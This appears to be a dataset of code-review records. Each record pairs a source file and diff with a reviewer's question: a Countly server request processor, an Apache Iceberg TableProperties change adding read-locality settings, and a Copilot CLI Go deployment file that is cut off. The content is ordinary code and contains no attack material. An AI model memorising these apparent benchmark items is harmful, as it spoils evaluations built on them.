&& errDb) ? 400 : 200; common.returnMessage(params, statusCode, response); }); }); }); break; } case '/o/sdk': { params.ip_address = params.qstring.ip_address || common.getIpAddress(params.req); params.user = {}; if (!params.qstring.app_key || !params.qstring.device_id) { common.returnMessage(params, 400, 'Missing parameter "app_key" or "device_id"'); return false; } else { params.qstring.device_id += ""; params.app_user_id = common.crypto.createHash('sha1') .update(params.qstring.app_key + params.qstring.device_id + "") .digest('hex'); } log.d('processing request %j', params.qstring); params.promises = []; validateAppForFetchAPI(params, () => { }); break; } case '/o/notes': { validateUserForDataReadAPI(params, 'core', countlyApi.mgmt.users.fetchNotes); break; } default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, validateUserForWriteAPI: validateUserForWriteAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { if (!plugins.dispatch(params.fullPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, validateUserForWriteAPI: validateUserForWriteAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } } } } else { if (!params.res.finished) { common.returnMessage(params, 200, 'Request ignored: ' + params.cancelRequest); } common.log("request").i('Request ignored: ' + params.cancelRequest, params.req.url, params.req.body); } }, function() {}); }; /** * Process Request Data * @param {params} params - params object * @param {object} app - app document * @param {function} done - callbck when processing done */ const processRequestData = (params, app, done) => { //preserve time for user's previous session params.previous_session = params.app_user.lsid; params.previous_session_start = params.app_user.ls; params.request_id = params.request_hash + "_" + params.app_user.uid + "_" + params.time.mstimestamp; var ob = {params: params, app: app, updates: []}; plugins.dispatch("/sdk/user_properties", ob, function() { var update = {}; //check if we already processed app users for this request if (params.app_user.last_req !== params.request_hash && ob.updates.length) { ob.updates.push({$set: {last_req: params.request_hash, ingested: false}}); for (let i = 0; i < ob.updates.length; i++) { update = common.mergeQuery(update, ob.updates[i]); } } var newUser = params.app_user.fs ? 
false : true; common.updateAppUser(params, update, function() { if (!plugins.getConfig("api", params.app && params.app.plugins, true).safe && !params.res.finished) { common.returnMessage(params, 200, 'Success'); } if (params.qstring.begin_session) { plugins.dispatch("/session/retention", { params: params, user: params.app_user, isNewUser: newUser }); } if (params.qstring.events) { if (params.promises) { params.promises.push(countlyApi.data.events.processEvents(params)); } else { countlyApi.data.events.processEvents(params); } } //process the rest of the plugins as usual plugins.dispatch("/i", { params: params, app: app }); plugins.dispatch("/sdk/data_ingestion", {params: params}, function(result) { var retry = false; if (result && result.length) { for (let index = 0; index < result.length; index++) { if (result[index].status === "rejected") { retry = true; break; } } } if (!retry && plugins.getConfig("api", params.app && params.app.plugins, true).safe) { //acknowledge data ingestion common.updateAppUser(params, {$set: {ingested: true}}); } if (!params.res.finished) { if (retry) { common.returnMessage(params, 400, 'Could not ingest data'); } else { common.returnMessage(params, 200, 'Success'); } } if (done) { done(); } }); }); }); }; /** * Process fetch request from sdk * @param {object} params - params object * @param {object} app - app document * @param {function} done - callback when processing done */ const processFetchRequest = (params, app, done) => { if (params.qstring.metrics) { try { countlyApi.data.usage.returnAllProcessedMetrics(params); } catch (ex) { console.log("Could not process metrics"); } } plugins.dispatch("/o/sdk", { params: params, app: app }, () => { if (!params.res.finished) { common.returnMessage(params, 400, 'Invalid method'); } //LOGGING THE REQUEST AFTER THE RESPONSE HAS BEEN SENT plugins.dispatch("/o/sdk/log", { params: params, app: params.app }, () => { }); return done ? 
done() : false; }); }; /** * Process Bulk Request * @param {number} i - request number in bulk * @param {array} requests - array of requests to process * @param {params} params - params object * @returns {void} void */ const processBulkRequest = (i, requests, params) => { const appKey = params.qstring.app_key; if (i === requests.length) { common.unblockResponses(params); if (plugins.getConfig("api", params.app && params.app.plugins, true).safe && !params.res.finished) { common.returnMessage(params, 200, 'Success'); } return; } if (!requests[i] || (!requests[i].app_key && !appKey)) { return processBulkRequest(i + 1, requests, params); } params.req.body = JSON.stringify(requests[i]); const tmpParams = { 'app_id': '', 'app_cc': '', 'ip_address': requests[i].ip_address || common.getIpAddress(params.req), 'user': { 'country': requests[i].country_code || 'Unknown', 'city': requests[i].city || 'Unknown' }, 'qstring': requests[i], 'href': "/i", 'res': params.res, 'req': params.req, 'promises': [], 'bulk': true, 'populator': params.qstring.populator }; tmpParams.qstring.app_key = (requests[i].app_key || appKey) + ""; if (!tmpParams.qstring.device_id) { return processBulkRequest(i + 1, requests, params); } else { //make sure device_id is string tmpParams.qstring.device_id += ""; tmpParams.app_user_id = common.crypto.createHash('sha1') .update(tmpParams.qstring.app_key + tmpParams.qstring.device_id + "") .digest('hex'); } return validateAppForWriteAPI(tmpParams, () => { /** * Dispatches /sdk/end event upon finishing processing request **/ function resolver() { plugins.dispatch("/sdk/end", {params: tmpParams}, () => { processBulkRequest(i + 1, requests, params); }); } Promise.all(tmpParams.promises) .then(resolver) .catch((error) => { console.log(error); resolver(); }); }); }; /** * @param {object} params - params object * @param {String} type - source type * @param {Function} done - done callback * @returns {Function} - done or boolean value */ const checksumSaltVerification = (params) => { if (params.app.checksum_salt && params.app.checksum_salt.length && !params.no_checksum) { const payloads = []; payloads.push(params.href.substr(params.fullPath.length + 1)); if (params.req.method.toLowerCase() === 'post') { payloads.push(params.req.body); } if (typeof params.qstring.checksum !== "undefined") { for (let i = 0; i < payloads.length; i++) { payloads[i] = (payloads[i] + "").replace("&checksum=" + params.qstring.checksum, "").replace("checksum=" + params.qstring.checksum, ""); payloads[i] = common.crypto.createHash('sha1').update(payloads[i] + params.app.checksum_salt).digest('hex').toUpperCase(); } if (payloads.indexOf((params.qstring.checksum + "").toUpperCase()) === -1) { common.returnMessage(params, 200, 'Request does not match checksum'); console.log("Checksum did not match", params.href, params.req.body, payloads); params.cancelRequest = 'Request does not match checksum sha1'; plugins.dispatch("/sdk/cancel", {params: params}); return false; } } else if (typeof params.qstring.checksum256 !== "undefined") { for (let i = 0; i < payloads.length; i++) { payloads[i] = (payloads[i] + "").replace("&checksum256=" + params.qstring.checksum256, "").replace("checksum256=" + params.qstring.checksum256, ""); payloads[i] = common.crypto.createHash('sha256').update(payloads[i] + params.app.checksum_salt).digest('hex').toUpperCase(); } if (payloads.indexOf((params.qstring.checksum256 + "").toUpperCase()) === -1) { common.returnMessage(params, 200, 'Request does not match checksum'); console.log("Checksum did not 
match", params.href, params.req.body, payloads); params.cancelRequest = 'Request does not match checksum sha256'; plugins.dispatch("/sdk/cancel", {params: params}); return false; } } else { common.returnMessage(params, 200, 'Request does not have checksum'); console.log("Request does not have checksum", params.href, params.req.body); params.cancelRequest = "Request does not have checksum"; plugins.dispatch("/sdk/cancel", {params: params}); return false; } } return true; }; /** * Validate App for Write API * Checks app_key from the http request against "apps" collection. * This is the first step of every write request to API. * @param {params} params - params object * @param {function} done - callback when processing done * @param {number} try_times - how many times request was retried * @returns {void} void */ const validateAppForWriteAPI = (params, done, try_times) => { if (ignorePossibleDevices(params)) { return done ? done() : false; } common.readBatcher.getOne("apps", {'key': params.qstring.app_key + ""}, (err, app) => { if (!app) { common.returnMessage(params, 400, 'App does not exist'); params.cancelRequest = "App not found or no Database connection"; return done ? done() : false; } if (app.paused) { common.returnMessage(params, 400, 'App is currently not accepting data'); params.cancelRequest = "App is currently not accepting data"; plugins.dispatch("/sdk/cancel", {params: params}); return done ? done() : false; } if ((params.populator || params.qstring.populator) && app.locked) { common.returnMessage(params, 403, "App is locked"); params.cancelRequest = "App is locked"; plugins.dispatch("/sdk/cancel", {params: params}); return false; } params.app_id = app._id; params.app_cc = app.country; params.app_name = app.name; params.appTimezone = app.timezone; params.app = app; params.time = common.initTimeObj(params.appTimezone, params.qstring.timestamp); var time = Date.now().valueOf(); time = Math.round((time || 0) / 1000); if (params.app && (!params.app.last_data || params.app.last_data < time - 60 * 60 * 24)) { //update if more than day passed //set new value common.db.collection("apps").update({"_id": common.db.ObjectID(params.app._id)}, {"$set": {"last_data": time}}, function(err1) { if (err1) { console.log("Failed to update apps collection " + err1); } common.readBatcher.invalidate("apps", {"key": params.app.key}, {}, false); //because we load app by key on incoming requests. so invalidate also by key }); } if (!checksumSaltVerification(params)) { return done ? done() : false; } if (typeof params.qstring.tz !== 'undefined' && !isNaN(parseInt(params.qstring.tz))) { params.user.tz = parseInt(params.qstring.tz); } common.db.collection('app_users' + params.app_id).findOne({'_id': params.app_user_id}, (err2, user) => { if (err2) { common.returnMessage(params, 400, 'Cannot get app user'); params.cancelRequest = "Cannot get app user or no Database connection"; return done ? 
done() : false; } params.app_user = user || {}; let payload = params.href.substr(3) || ""; if (params.req.method.toLowerCase() === 'post') { payload += params.req.body; } params.request_hash = common.crypto.createHash('sha1').update(payload).digest('hex') + (params.qstring.timestamp || params.time.mstimestamp); if (plugins.getConfig("api", params.app && params.app.plugins, true).prevent_duplicate_requests) { //check unique millisecond timestamp, if it is the same as the last request had, //then we are having duplicate request, due to sudden connection termination if (params.app_user.last_req === params.request_hash && (!plugins.getConfig("api", params.app && params.app.plugins, true).safe || params.app_user.ingested)) { params.cancelRequest = "Duplicate request"; } } if (params.qstring.metrics && typeof params.qstring.metrics === "string") { try { params.qstring.metrics = JSON.parse(params.qstring.metrics); } catch (SyntaxError) { console.log('Parse metrics JSON failed', params.qstring.metrics, params.req.url, params.req.body); } } plugins.dispatch("/sdk/pre", { params: params, app: app }, () => { plugins.dispatch("/sdk", { params: params, app: app }, () => { plugins.dispatch("/sdk/log", {params: params}); if (!params.cancelRequest) { processUser(params, validateAppForWriteAPI, done, try_times).then((userErr) => { if (userErr) { if (!params.res.finished) { common.returnMessage(params, 400, userErr); } } else { processRequestData(params, app, done); } }); } else { if (!params.res.finished && !params.waitForResponse) { common.returnOutput(params, {result: 'Success', info: 'Request ignored: ' + params.cancelRequest}); //common.returnMessage(params, 200, 'Request ignored: ' + params.cancelRequest); } common.log("request").i('Request ignored: ' + params.cancelRequest, params.req.url, params.req.body); return done ? done() : false; } }); }); }); }); }; /** * Validate app for fetch API from sdk * @param {object} params - params object * @param {function} done - callback when processing done * @param {number} try_times - how many times request was retried * @returns {function} done - done callback */ const validateAppForFetchAPI = (params, done, try_times) => { if (ignorePossibleDevices(params)) { return done ? done() : false; } common.readBatcher.getOne("apps", {'key': params.qstring.app_key}, (err, app) => { if (!app) { common.returnMessage(params, 400, 'App does not exist'); params.cancelRequest = "App not found or no Database connection"; return done ? done() : false; } params.app_id = app._id; params.app_cc = app.country; params.app_name = app.name; params.appTimezone = app.timezone; params.app = app; params.time = common.initTimeObj(params.appTimezone, params.qstring.timestamp); if (!checksumSaltVerification(params)) { return done ? 
done() : false; } if (params.qstring.metrics && typeof params.qstring.metrics === "string") { try { params.qstring.metrics = JSON.parse(params.qstring.metrics); } catch (SyntaxError) { console.log('Parse metrics JSON failed for sdk fetch request', params.qstring.metrics, params.req.url, params.req.body); } } var parallelTasks = [countlyApi.data.usage.setLocation(params)]; var processThisUser = true; if (app.paused) { log.d("App is currently not accepting data"); processThisUser = false; } if ((params.populator || params.qstring.populator) && app.locked) { log.d("App is locked"); processThisUser = false; } if (!processThisUser) { parallelTasks.push(fetchAppUser(params)); } else { parallelTasks.push(fetchAppUser(params).then(() => { return processUser(params, validateAppForFetchAPI, done, try_times); })); } Promise.all( parallelTasks ) .catch((error) => { console.error(error); }) .finally(() => { processFetchRequest(params, app, done); }); }); }; /** * Restart Request * @param {params} params - params object * @param {function} initiator - function which initiated request * @param {function} done - callback when processing done * @param {number} try_times - how many times request was retried * @param {function} fail - callback when restart limit reached * @returns {void} void */ const restartRequest = (params, initiator, done, try_times, fail) => { if (!try_times) { try_times = 1; } else { try_times++; } if (try_times > 5) { console.log("Too many retries", try_times); if (typeof fail === "function") { fail("Cannot process request. Too many retries"); } return; } params.retry_request = true; //retry request initiator(params, done, try_times); }; /** * @param {object} params - params object * @param {function} initiator - function which initiated request * @param {function} done - callback when processing done * @param {number} try_times - how many times request was retried * @returns {Promise} - resolved */ function processUser(params, initiator, done, try_times) { return new Promise((resolve) => { if (!params.app_user.uid) { //first time we see this user, we need to id him with uid countlyApi.mgmt.appUsers.getUid(params.app_id, function(err, uid) { plugins.dispatch("/i/app_users/create", { app_id: params.app_id, user: {uid: uid, did: params.qstring.device_id, _id: params.app_user_id }, res: {uid: uid, did: params.qstring.device_id, _id: params.app_user_id }, params: params }); if (uid) { params.app_user.uid = uid; if (!params.app_user._id) { //if document was not yet created //we try to insert one with uid //even if paralel request already inserted uid //this insert will fail //but we will retry again and fetch new inserted document common.db.collection('app_users' + params.app_id).insert({ _id: params.app_user_id, uid: uid, did: params.qstring.device_id }, {ignore_errors: [11000]}, function() { restartRequest(params, initiator, done, try_times, resolve); }); } else { //document was created, but has no uid //here we add uid only if it does not exist in db //so if paralel request inserted it, we will not overwrite it //and retrieve that uid on retry common.db.collection('app_users' + params.app_id).update({ _id: params.app_user_id, uid: {$exists: false} }, {$set: {uid: uid}}, {upsert: true, ignore_errors: [11000]}, function() { restartRequest(params, initiator, done, try_times, resolve); }); } } else { //cannot create uid, so cannot process request now console.log("Cannot create uid", err, uid); resolve("Cannot create uid"); } }); } //check if device id was changed else if 
(params.qstring.old_device_id && params.qstring.old_device_id !== params.qstring.device_id) { const old_id = common.crypto.createHash('sha1') .update(params.qstring.app_key + params.qstring.old_device_id + "") .digest('hex'); countlyApi.mgmt.appUsers.merge(params.app_id, params.app_user, params.app_user_id, old_id, params.qstring.device_id, params.qstring.old_device_id, function(err) { if (err) { return common.returnMessage(params, 400, 'Cannot update user'); } //remove old device ID and retry request params.qstring.old_device_id = null; restartRequest(params, initiator, done, try_times, resolve); }); } else { resolve(); } }); } /** * Function to fetch app user from db * @param {object} params - params object * @returns {promise} - user */ const fetchAppUser = (params) => { return new Promise((resolve) => { common.db.collection('app_users' + params.app_id).findOne({'_id': params.app_user_id}, (err2, user) => { params.app_user = user || {}; return resolve(user); }); }); }; /** * Add devices to ignore them * @param {params} params - params object * @param {function} done - callback when processing done * @returns {function} done */ const ignorePossibleDevices = (params) => { //ignore possible opted out users for ios 10 if (params.qstring.device_id === "00000000-0000-0000-0000-000000000000") { common.returnMessage(params, 400, 'Ignoring device_id'); common.log("request").i('Request ignored: Ignoring zero IDFA device_id', params.req.url, params.req.body); params.cancelRequest = "Ignoring zero IDFA device_id"; plugins.dispatch("/sdk/cancel", {params: params}); return true; } }; /** * Fetches version mark history (filesystem) * @param {function} callback - callback when response is ready * @returns {void} void */ function loadFsVersionMarks(callback) { fs.readFile(path.resolve(__dirname, "./../../countly_marked_version.json"), function(err, data) { if (err) { callback(err, []); } else { var olderVersions = []; try { olderVersions = JSON.parse(data); } catch (parseErr) { //unable to parse file console.log(parseErr); callback(parseErr, []); } if (Array.isArray(olderVersions)) { //sort versions here. olderVersions.sort(function(a, b) { if (typeof a.updated !== "undefined" && typeof b.updated !== "undefined") { return a.updated - b.updated; } else { return 1; } }); callback(null, olderVersions); } } }); } /** * Fetches version mark history (database) * @param {function} callback - callback when response is ready * @returns {void} void */ function loadDbVersionMarks(callback) { common.db.collection('plugins').find({'_id': 'version'}, {"history": 1}).toArray(function(err, versionDocs) { if (err) { console.log(err); callback(err, []); return; } var history = []; if (versionDocs[0] && versionDocs[0].history) { history = versionDocs[0].history; } callback(null, history); }); } /** @lends module:api/utils/requestProcessor */ module.exports = {processRequest: processRequest};
1
14,332
Did you remove **params.qstring.method** intentionally? If so, why?
Countly-countly-server
js
@@ -90,6 +90,12 @@ public class TableProperties { public static final String ORC_VECTORIZATION_ENABLED = "read.orc.vectorization.enabled"; public static final boolean ORC_VECTORIZATION_ENABLED_DEFAULT = false; + public static final String LOCALITY_ENABLED = "read.locality.enabled"; + public static final String LOCALITY_ENABLED_DEFAULT = null; + + public static final String LOCALITY_TASK_INITIALIZE_THREADS = "read.locality.task.initialize.threads"; + public static final int LOCALITY_TASK_INITIALIZE_THREADS_DEFAULT = 1; + public static final String OBJECT_STORE_ENABLED = "write.object-storage.enabled"; public static final boolean OBJECT_STORE_ENABLED_DEFAULT = false;
1
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.iceberg; public class TableProperties { private TableProperties() { } public static final String COMMIT_NUM_RETRIES = "commit.retry.num-retries"; public static final int COMMIT_NUM_RETRIES_DEFAULT = 4; public static final String COMMIT_MIN_RETRY_WAIT_MS = "commit.retry.min-wait-ms"; public static final int COMMIT_MIN_RETRY_WAIT_MS_DEFAULT = 100; public static final String COMMIT_MAX_RETRY_WAIT_MS = "commit.retry.max-wait-ms"; public static final int COMMIT_MAX_RETRY_WAIT_MS_DEFAULT = 60000; // 1 minute public static final String COMMIT_TOTAL_RETRY_TIME_MS = "commit.retry.total-timeout-ms"; public static final int COMMIT_TOTAL_RETRY_TIME_MS_DEFAULT = 1800000; // 30 minutes public static final String COMMIT_NUM_STATUS_CHECKS = "commit.num-status-checks"; public static final int COMMIT_NUM_STATUS_CHECKS_DEFAULT = 3; public static final String MANIFEST_TARGET_SIZE_BYTES = "commit.manifest.target-size-bytes"; public static final long MANIFEST_TARGET_SIZE_BYTES_DEFAULT = 8388608; // 8 MB public static final String MANIFEST_MIN_MERGE_COUNT = "commit.manifest.min-count-to-merge"; public static final int MANIFEST_MIN_MERGE_COUNT_DEFAULT = 100; public static final String MANIFEST_MERGE_ENABLED = "commit.manifest-merge.enabled"; public static final boolean MANIFEST_MERGE_ENABLED_DEFAULT = true; public static final String DEFAULT_FILE_FORMAT = "write.format.default"; public static final String DEFAULT_FILE_FORMAT_DEFAULT = "parquet"; public static final String PARQUET_ROW_GROUP_SIZE_BYTES = "write.parquet.row-group-size-bytes"; public static final String PARQUET_ROW_GROUP_SIZE_BYTES_DEFAULT = "134217728"; // 128 MB public static final String PARQUET_PAGE_SIZE_BYTES = "write.parquet.page-size-bytes"; public static final String PARQUET_PAGE_SIZE_BYTES_DEFAULT = "1048576"; // 1 MB public static final String PARQUET_DICT_SIZE_BYTES = "write.parquet.dict-size-bytes"; public static final String PARQUET_DICT_SIZE_BYTES_DEFAULT = "2097152"; // 2 MB public static final String PARQUET_COMPRESSION = "write.parquet.compression-codec"; public static final String PARQUET_COMPRESSION_DEFAULT = "gzip"; public static final String PARQUET_COMPRESSION_LEVEL = "write.parquet.compression-level"; public static final String PARQUET_COMPRESSION_LEVEL_DEFAULT = null; public static final String AVRO_COMPRESSION = "write.avro.compression-codec"; public static final String AVRO_COMPRESSION_DEFAULT = "gzip"; public static final String SPLIT_SIZE = "read.split.target-size"; public static final long SPLIT_SIZE_DEFAULT = 134217728; // 128 MB public static final String METADATA_SPLIT_SIZE = "read.split.metadata-target-size"; public static final long METADATA_SPLIT_SIZE_DEFAULT = 32 * 1024 * 1024; // 32 MB public static final String 
SPLIT_LOOKBACK = "read.split.planning-lookback"; public static final int SPLIT_LOOKBACK_DEFAULT = 10; public static final String SPLIT_OPEN_FILE_COST = "read.split.open-file-cost"; public static final long SPLIT_OPEN_FILE_COST_DEFAULT = 4 * 1024 * 1024; // 4MB public static final String PARQUET_VECTORIZATION_ENABLED = "read.parquet.vectorization.enabled"; public static final boolean PARQUET_VECTORIZATION_ENABLED_DEFAULT = false; public static final String PARQUET_BATCH_SIZE = "read.parquet.vectorization.batch-size"; public static final int PARQUET_BATCH_SIZE_DEFAULT = 5000; public static final String ORC_VECTORIZATION_ENABLED = "read.orc.vectorization.enabled"; public static final boolean ORC_VECTORIZATION_ENABLED_DEFAULT = false; public static final String OBJECT_STORE_ENABLED = "write.object-storage.enabled"; public static final boolean OBJECT_STORE_ENABLED_DEFAULT = false; public static final String OBJECT_STORE_PATH = "write.object-storage.path"; public static final String WRITE_LOCATION_PROVIDER_IMPL = "write.location-provider.impl"; // This only applies to files written after this property is set. Files previously written aren't // relocated to reflect this parameter. // If not set, defaults to a "data" folder underneath the root path of the table. public static final String WRITE_NEW_DATA_LOCATION = "write.folder-storage.path"; // This only applies to files written after this property is set. Files previously written aren't // relocated to reflect this parameter. // If not set, defaults to a "metadata" folder underneath the root path of the table. public static final String WRITE_METADATA_LOCATION = "write.metadata.path"; public static final String WRITE_PARTITION_SUMMARY_LIMIT = "write.summary.partition-limit"; public static final int WRITE_PARTITION_SUMMARY_LIMIT_DEFAULT = 0; public static final String MANIFEST_LISTS_ENABLED = "write.manifest-lists.enabled"; public static final boolean MANIFEST_LISTS_ENABLED_DEFAULT = true; public static final String METADATA_COMPRESSION = "write.metadata.compression-codec"; public static final String METADATA_COMPRESSION_DEFAULT = "none"; public static final String METADATA_PREVIOUS_VERSIONS_MAX = "write.metadata.previous-versions-max"; public static final int METADATA_PREVIOUS_VERSIONS_MAX_DEFAULT = 100; // This enables to delete the oldest metadata file after commit. 
public static final String METADATA_DELETE_AFTER_COMMIT_ENABLED = "write.metadata.delete-after-commit.enabled"; public static final boolean METADATA_DELETE_AFTER_COMMIT_ENABLED_DEFAULT = false; public static final String METRICS_MODE_COLUMN_CONF_PREFIX = "write.metadata.metrics.column."; public static final String DEFAULT_WRITE_METRICS_MODE = "write.metadata.metrics.default"; public static final String DEFAULT_WRITE_METRICS_MODE_DEFAULT = "truncate(16)"; public static final String DEFAULT_NAME_MAPPING = "schema.name-mapping.default"; public static final String WRITE_AUDIT_PUBLISH_ENABLED = "write.wap.enabled"; public static final String WRITE_AUDIT_PUBLISH_ENABLED_DEFAULT = "false"; public static final String WRITE_TARGET_FILE_SIZE_BYTES = "write.target-file-size-bytes"; public static final long WRITE_TARGET_FILE_SIZE_BYTES_DEFAULT = 536870912; // 512 MB public static final String SPARK_WRITE_PARTITIONED_FANOUT_ENABLED = "write.spark.fanout.enabled"; public static final boolean SPARK_WRITE_PARTITIONED_FANOUT_ENABLED_DEFAULT = false; public static final String SNAPSHOT_ID_INHERITANCE_ENABLED = "compatibility.snapshot-id-inheritance.enabled"; public static final boolean SNAPSHOT_ID_INHERITANCE_ENABLED_DEFAULT = false; public static final String ENGINE_HIVE_ENABLED = "engine.hive.enabled"; public static final boolean ENGINE_HIVE_ENABLED_DEFAULT = false; public static final String WRITE_DISTRIBUTION_MODE = "write.distribution-mode"; public static final String WRITE_DISTRIBUTION_MODE_NONE = "none"; public static final String WRITE_DISTRIBUTION_MODE_HASH = "hash"; public static final String WRITE_DISTRIBUTION_MODE_RANGE = "range"; public static final String WRITE_DISTRIBUTION_MODE_DEFAULT = WRITE_DISTRIBUTION_MODE_NONE; public static final String GC_ENABLED = "gc.enabled"; public static final boolean GC_ENABLED_DEFAULT = true; public static final String MAX_SNAPSHOT_AGE_MS = "history.expire.max-snapshot-age-ms"; public static final long MAX_SNAPSHOT_AGE_MS_DEFAULT = 5 * 24 * 60 * 60 * 1000; // 5 days public static final String MIN_SNAPSHOTS_TO_KEEP = "history.expire.min-snapshots-to-keep"; public static final int MIN_SNAPSHOTS_TO_KEEP_DEFAULT = 1; public static final String DELETE_ISOLATION_LEVEL = "write.delete.isolation-level"; public static final String DELETE_ISOLATION_LEVEL_DEFAULT = "serializable"; public static final String DELETE_MODE = "write.delete.mode"; public static final String DELETE_MODE_DEFAULT = "copy-on-write"; public static final String UPDATE_ISOLATION_LEVEL = "write.update.isolation-level"; public static final String UPDATE_ISOLATION_LEVEL_DEFAULT = "serializable"; public static final String UPDATE_MODE = "write.update.mode"; public static final String UPDATE_MODE_DEFAULT = "copy-on-write"; public static final String MERGE_ISOLATION_LEVEL = "write.merge.isolation-level"; public static final String MERGE_ISOLATION_LEVEL_DEFAULT = "serializable"; public static final String MERGE_MODE = "write.merge.mode"; public static final String MERGE_MODE_DEFAULT = "copy-on-write"; public static final String MERGE_CARDINALITY_CHECK_ENABLED = "write.merge.cardinality-check.enabled"; public static final boolean MERGE_CARDINALITY_CHECK_ENABLED_DEFAULT = true; }
1
37,157
What is the current default? Is it inconsistent across uses, and is that why this is null?
apache-iceberg
java
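The question above concerns `LOCALITY_ENABLED_DEFAULT = null` in the TableProperties diff. A minimal sketch of why a nullable String default can be deliberate: it lets the reader of the property distinguish "not set" (fall back to an environment-dependent default, for example enabling locality only for HDFS paths) from an explicit true/false chosen by the user. The helper below is hypothetical and not Iceberg API; only the property key comes from the diff.

```java
import java.util.Map;

public class LocalityExample {
    static final String LOCALITY_ENABLED = "read.locality.enabled";

    // Returns the user's explicit choice when the property is set,
    // otherwise falls back to an environment-dependent default.
    static boolean resolveLocality(Map<String, String> tableProps, boolean envDefault) {
        String value = tableProps.get(LOCALITY_ENABLED); // null means "not set"
        if (value == null) {
            return envDefault; // e.g. enable locality only when reading from HDFS
        }
        return Boolean.parseBoolean(value); // explicit user choice wins
    }

    public static void main(String[] args) {
        System.out.println(resolveLocality(Map.of(), true));                           // true (fallback)
        System.out.println(resolveLocality(Map.of(LOCALITY_ENABLED, "false"), true));  // false (explicit)
    }
}
```

With a boolean default constant instead of null, the fallback case would be indistinguishable from an explicit setting, which is one plausible reason the default is declared as a null String here.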
@@ -477,6 +477,7 @@ func (cf CloudFormation) getLastDeployedAppConfig(appConfig *stack.AppStackConfi if err != nil { return nil, fmt.Errorf("parse previous deployed stackset %w", err) } + previouslyDeployedConfig.App = appConfig.Name return previouslyDeployedConfig, nil }
1
// Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. // SPDX-License-Identifier: Apache-2.0 package cloudformation import ( "context" "errors" "fmt" "github.com/aws/aws-sdk-go/aws" sdkcloudformation "github.com/aws/aws-sdk-go/service/cloudformation" sdkcloudformationiface "github.com/aws/aws-sdk-go/service/cloudformation/cloudformationiface" "github.com/aws/copilot-cli/internal/pkg/aws/cloudformation" "github.com/aws/copilot-cli/internal/pkg/aws/cloudformation/stackset" "github.com/aws/copilot-cli/internal/pkg/config" "github.com/aws/copilot-cli/internal/pkg/deploy" "github.com/aws/copilot-cli/internal/pkg/deploy/cloudformation/stack" ) // DeployApp sets up everything required for our application-wide resources. // These resources include things that are regional, rather than scoped to a particular // environment, such as ECR Repos, CodePipeline KMS keys & S3 buckets. // We deploy application resources through StackSets - that way we can have one // template that we update and all regional stacks are updated. func (cf CloudFormation) DeployApp(in *deploy.CreateAppInput) error { appConfig := stack.NewAppStackConfig(in) s, err := toStack(appConfig) if err != nil { return err } if err := cf.cfnClient.CreateAndWait(s); err != nil { // If the stack already exists - we can move on to creating the StackSet. var alreadyExists *cloudformation.ErrStackAlreadyExists if !errors.As(err, &alreadyExists) { return err } } blankAppTemplate, err := appConfig.ResourceTemplate(&stack.AppResourcesConfig{ App: appConfig.Name, }) if err != nil { return err } return cf.appStackSet.Create(appConfig.StackSetName(), blankAppTemplate, stackset.WithDescription(appConfig.StackSetDescription()), stackset.WithExecutionRoleName(appConfig.StackSetExecutionRoleName()), stackset.WithAdministrationRoleARN(appConfig.StackSetAdminRoleARN()), stackset.WithTags(toMap(appConfig.Tags()))) } func (cf CloudFormation) UpgradeApplication(in *deploy.CreateAppInput) error { appConfig := stack.NewAppStackConfig(in) s, err := toStack(appConfig) if err != nil { return err } if err := cf.upgradeAppStack(s); err != nil { return err } return cf.upgradeAppStackSet(appConfig) } func (cf CloudFormation) upgradeAppStackSet(config *stack.AppStackConfig) error { for { ssName := config.StackSetName() if err := cf.appStackSet.WaitForStackSetLastOperationComplete(ssName); err != nil { return fmt.Errorf("wait for stack set %s last operation complete: %w", ssName, err) } previouslyDeployedConfig, err := cf.getLastDeployedAppConfig(config) if err != nil { return err } previouslyDeployedConfig.Version += 1 err = cf.deployAppConfig(config, previouslyDeployedConfig) if err == nil { return nil } var stackSetOutOfDateErr *stackset.ErrStackSetOutOfDate if errors.As(err, &stackSetOutOfDateErr) { continue } return err } } func (cf CloudFormation) upgradeAppStack(s *cloudformation.Stack) error { for { // Upgrade app stack. descr, err := cf.cfnClient.Describe(s.Name) if err != nil { return fmt.Errorf("describe stack %s: %w", s.Name, err) } if cloudformation.StackStatus(aws.StringValue(descr.StackStatus)).InProgress() { // There is already an update happening to the app stack. // Best-effort try to wait for the existing update to be over before retrying. _ = cf.cfnClient.WaitForUpdate(context.Background(), s.Name) continue } s.Parameters = descr.Parameters s.Tags = descr.Tags err = cf.cfnClient.UpdateAndWait(s) if err == nil { // Success. 
return nil } if retryable := isRetryableUpdateError(s.Name, err); retryable { continue } // The changes are already applied, nothing to do. Exit successfully. var emptyChangeSet *cloudformation.ErrChangeSetEmpty if errors.As(err, &emptyChangeSet) { return nil } return fmt.Errorf("update and wait for stack %s: %w", s.Name, err) } } // DelegateDNSPermissions grants the provided account ID the ability to write to this application's // DNS HostedZone. This allows us to perform cross account DNS delegation. func (cf CloudFormation) DelegateDNSPermissions(app *config.Application, accountID string) error { deployApp := deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, DomainName: app.Domain, DomainHostedZoneID: app.DomainHostedZoneID, Version: deploy.LatestAppTemplateVersion, } appConfig := stack.NewAppStackConfig(&deployApp) appStack, err := cf.cfnClient.Describe(appConfig.StackName()) if err != nil { return fmt.Errorf("getting existing application infrastructure stack: %w", err) } dnsDelegatedAccounts := stack.DNSDelegatedAccountsForStack(appStack.SDK()) deployApp.DNSDelegationAccounts = append(dnsDelegatedAccounts, accountID) s, err := 